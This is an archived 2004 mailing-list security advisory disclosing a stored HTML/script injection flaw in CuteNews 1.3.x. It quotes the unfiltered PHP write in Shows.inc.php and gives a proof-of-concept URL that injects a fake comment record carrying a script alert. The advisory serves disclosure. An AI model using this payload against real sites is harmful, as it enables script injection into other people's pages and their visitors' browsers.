lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <1090145479.5907.200576764@webmail.messagingengine.com>
From: darkbicho at fastmail.fm (DarkBicho)
Subject: injection html CuteNews

Original Advisory: http://www.darkbicho.iberhosting.net/advisory-11.txt

-------------------------------------------------------------------------------------------------

                            :.: injection html CuteNews  :.: 

  PROGRAM: CuteNews 
  HOMEPAGE: http://cutephp.com/
  VERSION: v1.3.x
  BUG: injection html
  DATE:  15/07/2004
  AUTHOR: DarkBicho
          web: http://www.darkbicho.tk
          team: Security Wari Proyects <www.swp-zone.org>
          Email: darkbicho@...u.com

-------------------------------------------------------------------------------------------------


1.- Affected software description:
    -----------------------------

    CuteNews is a popular News Publishing, written in php by
    CutePHP.


2.- vulnerability:
    ---------------

    Injection HTML in commentaries

    /inc/Shows.inc.php

    Line: 189


    if(!$found){ fwrite($new_comments,
    "$id|>|$time|$name|$mail|$ip|$comments||\n"); }

    the variable $id is not filtered


    injection html
   
    id of it the news = 1078525267

    Example:

    show_news.php?subaction=addcomment&name=DarkBich0&comments=http://www.darkbicho.tk&id=1078525267|
    >|1090074219|DarkBich0|none|127.0.0.1|<script>alert("DarkBicho");</script>||
   
 
    :.: http://www.darkbicho.iberhosting.net/cutenews/cutenews.gif :.:


3.- Exploit:
    --------

    http://www.darkbicho.iberhosting.net/cutenews/


3.- SOLUTION:
     ????????
    Vendors were contacted many weeks ago and plan to release a fixed
    version soon. 
    Check the CuteNews website for updates and official release details. 


4.- Greetings:
    ---------

    greetings to my Peruvian group swp and perunderforce :D 
    "EL PISCO ES Y SERA PERUANO"


5.- Contact
    -------

	WEB: http://www.darkbicho.tk
	EMAIL: darkbicho@...u.com


-------------------------------------------------------------------------------------------------
                                ___________      ____________ 
                               /   _____/  \    /  \______   \   
                               \_____  \\   \/\/   /|     ___/      
                              /        \\        / |    |        
                             /_______  / \__/\  /  |____|       
                             \/       \/        
                       
                                Security Wari Projects 
                                  (c) 2002 - 2004
		                    Made in Peru

----------------------------------------[   EOF  
]----------------------------------------------
?
??
??
DarkBicho  
Web: http://www.darkbicho.tk
"Mi unico delito es ver lo que otros no pueden ver"

---------------------- The End ----------------------


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ